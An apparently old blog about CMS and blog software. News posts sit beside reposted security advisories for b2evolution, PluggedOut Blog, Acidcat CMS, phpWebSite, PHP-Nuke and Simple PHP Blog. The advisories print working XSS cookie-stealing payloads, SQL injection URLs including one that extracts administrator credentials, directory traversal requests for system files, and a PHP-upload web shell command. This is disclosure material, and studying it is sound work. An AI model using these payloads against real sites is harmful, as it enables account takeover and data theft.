Monday, February 26, 2007


XSS in b2Evolution

b2evolution is "a free blog tool for the next generation of blogs". A cross site scripting vulnerability in b2Evolution's login page allows attackers to insert arbitrary HTML and/or JavaScript into the login page.

Vulnerable versions:, 0.9.1, 1.6-alpha, 1.8.6, 1.9.1-beta

alert(document.cookie) <--- in 1 string.

Monday, July 10, 2006


PluggedOut Blog SQL INJECTION and XSS

PluggedOut Blog SQL INJECTION and XSS

PluggedOut Blog is an open source script you can run on your web server to give
you an online multi-user journal or diary.
It can be used equally well for any kind of calendar application.Rather than
give you a thousand things you don't really want ...
PluggedOut Blog :

The information has been provided by Hamid Ebadi (Hamid Network Security Team):
The original article can be found at:

Vulnerable Systems:
PluggedOut Blog Version : Version: 1.9.9c (2006-01-13)

example :
The following URL can be used to trigger an SQL injection vulnerability in the exec.php:
http://[PluggedOut Blog]/exec.php?action=comment_add&entryid=[SQL INJECTION]

and XSS
http://[PluggedOut Blog]/problem.php?id=1&data=>script<alert
('Hamid Network Security Team -->');alert(document.cookie)>/script<


Acidcat ASP CMS Multiple Vulnerabilities

Acidcat CMS is a web site and simple content management system that can be administered via a web browser.
It is free for non-commercial use.Acidcat CMS is also an open source product.
The product has been found to contain multiple security vulnerabilities allowing a remote attacker to find administrator username and password.
Acidcat ASP CMS :

The information has been provided by Hamid Ebadi (Hamid Network Security Team)
The original article can be found at:

Vulnerable Systems:
* Acidcat CMS v 2.1.13 and below
Example :
The following URL can be used to trigger an SQL injection vulnerability in the main_content.asp page: http://localhost/acidcat/default.asp?ID=1'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'ID = 1'''.
/main_content.asp, line 16

Vulnerable Code:
The following lines in main_content.asp
Item.Source = "SELECT * FROM Item WHERE ID = "+ Item__MMColParam.replace(/'/g, "''") + "";

The following URL will illustrate how you can easily find administrator username and password by entering the following URL:

http://localhost/acidcat/default.asp?ID=26 union select 1,username,3,password,5,6 from Configuration
The base path of the login is :

Database Download:
The database can be downloaded over the web (default installation).it can be found on http://localhost/acidcat/databases/acidcat.mdb

Sunday, March 06, 2005


PHP include in phpWebSite

PHP include in phpWebSite


Anyone, who has permissions to add announces, can upload php-script asa .gif file and execute it.


http://[target]/images/announce/[anyname].gif.php?nst=ls –la

Where [anyname].gif.php - php-script with this line:


Vulnerable Systems:

phpWebSite <= 0.10.0

Official Website: phpWebSite


Multiple Vulnerabilities in PHP-Nuke (db.php, index.php, Downloads, Web_Links)

Multiple Vulnerabilities in PHP-Nuke (db.php, index.php, Downloads, Web_Links)

Php-Nuke is "a popular open source content management system, written in PHP by Francisco Burzi. This CMS is used on many thousands websites, because it's freeware, easy to install and manage and has broad set of features".Multiple vulnerabilities were found in PHP-Nuke that result in Path Disclosure and Cross Site Scripting.


The information has been provided by Janek Vind.The original article can be found at:


Vulnerable Systems:

* PHP-Nuke version 6.0 up to version 7.6Path


There are several path disclosure in PHP-Nuke when any of the following sample URLs are accessed:





Cross Site Scripting

There are two parameters in the modules.php file that are vulnerable to Cross Site Scripting attacks:

In newdownloadshowdays

In newlinkshowdays

Friday, January 14, 2005


Interview with Lee Eason

Postnuke official website published the interview with Lee Eason - member of the pnCore team and responsible for the development of the module SDK.

He told some interesting things, for example, that PostNuke's greatest weakness is also its greatest strength: the modular nature of the system. Lee is also the author and director of pnFlashGames and And he told, that pnFlashGames has also weakness - "Well, the weakest part of my module is the pnHTML I think"

So read the interview :-)

Thursday, January 13, 2005


New Microsoft CMS Book Released

Microsoft released ‘Building Websites with Microsoft Content Management Server’.

The book presumes a working knowledge of the .NET Framework and familiarity with the C# language, but no prior knowledge of MCMS is required.

The following topics are covered in detail:

The basic concepts of MCMS
Preparing, installing and configuring MCMS and its supporting technologies
Creating an MCMS website from scratch
Creating and debugging templates files and channel rendering scripts

Working with dynamic navigation
Establishing user roles and rights
Authoring with MCMS and improving the authoring experience
Understanding and customizing workflow
Working with the Publishing API
Site deployment techniques
Enhancing your site's performance with caching



Tuesday, January 11, 2005


Angelinecms 0.7 screenshots

Here are some screenshots from the future version of angelinecms:

New user manager: shot1, shot2

New group manager: shot1, shot2

Source: Couple 0.7 screenshots


Simple PHP Blog Directory Traversal


Simple PHP Blog requires "no database to create a blog system but instead only requires PHP 4 (or greater) and write permission on the server".Two vulnerabilities in Simple PHP Blog are caused by inadequate testing for directory traversal attacks allow a remote attacker to view arbitrary files and create arbitrary directories.

Credit: The information has been provided by Madelman.


Vulnerable Systems: * Simple PHP Blog version 0.3.7r1 and prior

Immune Systems: * Simple PHP Blog version 0.3.7r2 or newer

We can read any file with TXT extension (in this example /etc/X11/rgb.txt)

Request: http://[SERVER]/sphpblog/comments.php?y=05&m=01&entry=../../../../../../../etc/X11/rgb

Returns the content of the file

We can create arbitrary folders in the file system and the content of the post will be saved in this folder. To create folder http://[SERVER]/sphpblog/createdir/

Request (this must be a POST request and we must modify entry parameter):http://[SERVER]/sphpblog/comment_add_cgi.php~ entry=../../../createdir

Source: Securiteam


b2Evolution 'title' SQL Injection

b2evolution is "probably the most comprehensive blog engine you can find".An SQL injection vulnerability has been found in b2evolution's 'title' parameter, allowing a remote attacker to cause the program to include arbitrary SQL statements inside its existing statement.

Credit:The information has been provided by r0ut3r.


Exploit:The following URL will trigger the vulnerability:


1: manual edit:

Open the file /blogs/b2evocore/_class_itemlist.php and find the following code around lines 197-201:


// if a post urltitle is specified, load that post

if( !empty( $title ) ) { $where .= " AND post_urltitle = '$title'"; }

Replace these lines like this:


// if a post urltitle is specified, load that post
if( !empty( $title ) ) { $where .= ' AND post_urltitle = '.$DB->quote($title); }

2: patch files

Download the following file: , unzip it and replace the two enclosed files in in the blogs/b2evocore folder. This second method also fixes a small harmless bug that would cause an error when testing the SQL injection issue is fixed.

Source (bug) : Securiteam
Source (woraround): b2evolution forums.



Developers of WordPress blog engine announced a new website, the WordPress Plugin repository. Great news for plugin developers!

Developers can:

Host their development for free
Be assured of high visibility
Manage their code using an SVN client
Track issues (bugs) using the tracker
Provide documentation using the wiki with the help of end-users.

WordPress Users can:

Browse all the plugins and themes.
Download plugins and themes from one location.
Provide feedback to plugin developers using the tracker.Help improve the plugin or theme.
Develop documentation at the wiki page for the plugins they use.
Stay in the the loop using the RSS feeds.




BLOG:CMS is the most complete, feature-packed, personal publishing system on the market, developed by Radek Hulán. It includes state-of-the-art weblog, forum, wiki engine, news aggregator (atom / rss), and photo gallery.


An overview of the most important BLOG:CMS features is given below.

Standards compliance
BLOG:CMS is probably the only system that is not only w3c valid, but also ships with application/xhtml+xml MIME type by default, for top performance on modern browsers like Mozilla, Firefox, Safari and Opera. But BLOG:CMS will also automatically supply older standard, text/html, to browsers which cannot handle this, like obsolete Microsoft Internet Explorer.
Maintenance of one or more weblogs/news-sites
With BLOG:CMS, you can set up one or more weblogs. If you want to, you can even show the contents of multiple weblogs on the same page.

Integrated Forum
With BLOG:CMS, you can host discussions to your articles in either your weblog, or in a forum. This gives you much more possibilities and freedom for larger discussions. BLOG:CMS members are automatically registered in your forum as well, and within your weblog you can see date and time of last forum post for each article.
Integrated Photo Gallery
Today, when digital cameras are more common than traditional ones, personal presentation without a Photo Gallery almost could not exists. BLOG:CMS ships with Singapore Photo Gallery, using GD2 and/or ImageMagic to create thumbnails.

Wiki engine
Wiki engine is a great tool for any documentation needs, for colaboration on projects. Anybody can add information to Wiki resource. Some of the worlds biggest knowledge resources are based on Wiki engines. BLOG:CMS comes with Dokuwiki engine, one of the best, and standards compliant.


You can always download the latest release of BLOG:CMS at Both zip format for Windows users, and tar.gz format for GNU/Linux users are provided.

These releases are currently available:

Release 3.5 - weblog, forum, photo gallery, news, wiki and contact sections (2350 KB): (recommended).

Release 3.4 - weblog and contact sections (1150 KB):

Monday, January 10, 2005



This is my first pilot post!

This page is powered by Blogger. Isn't yours?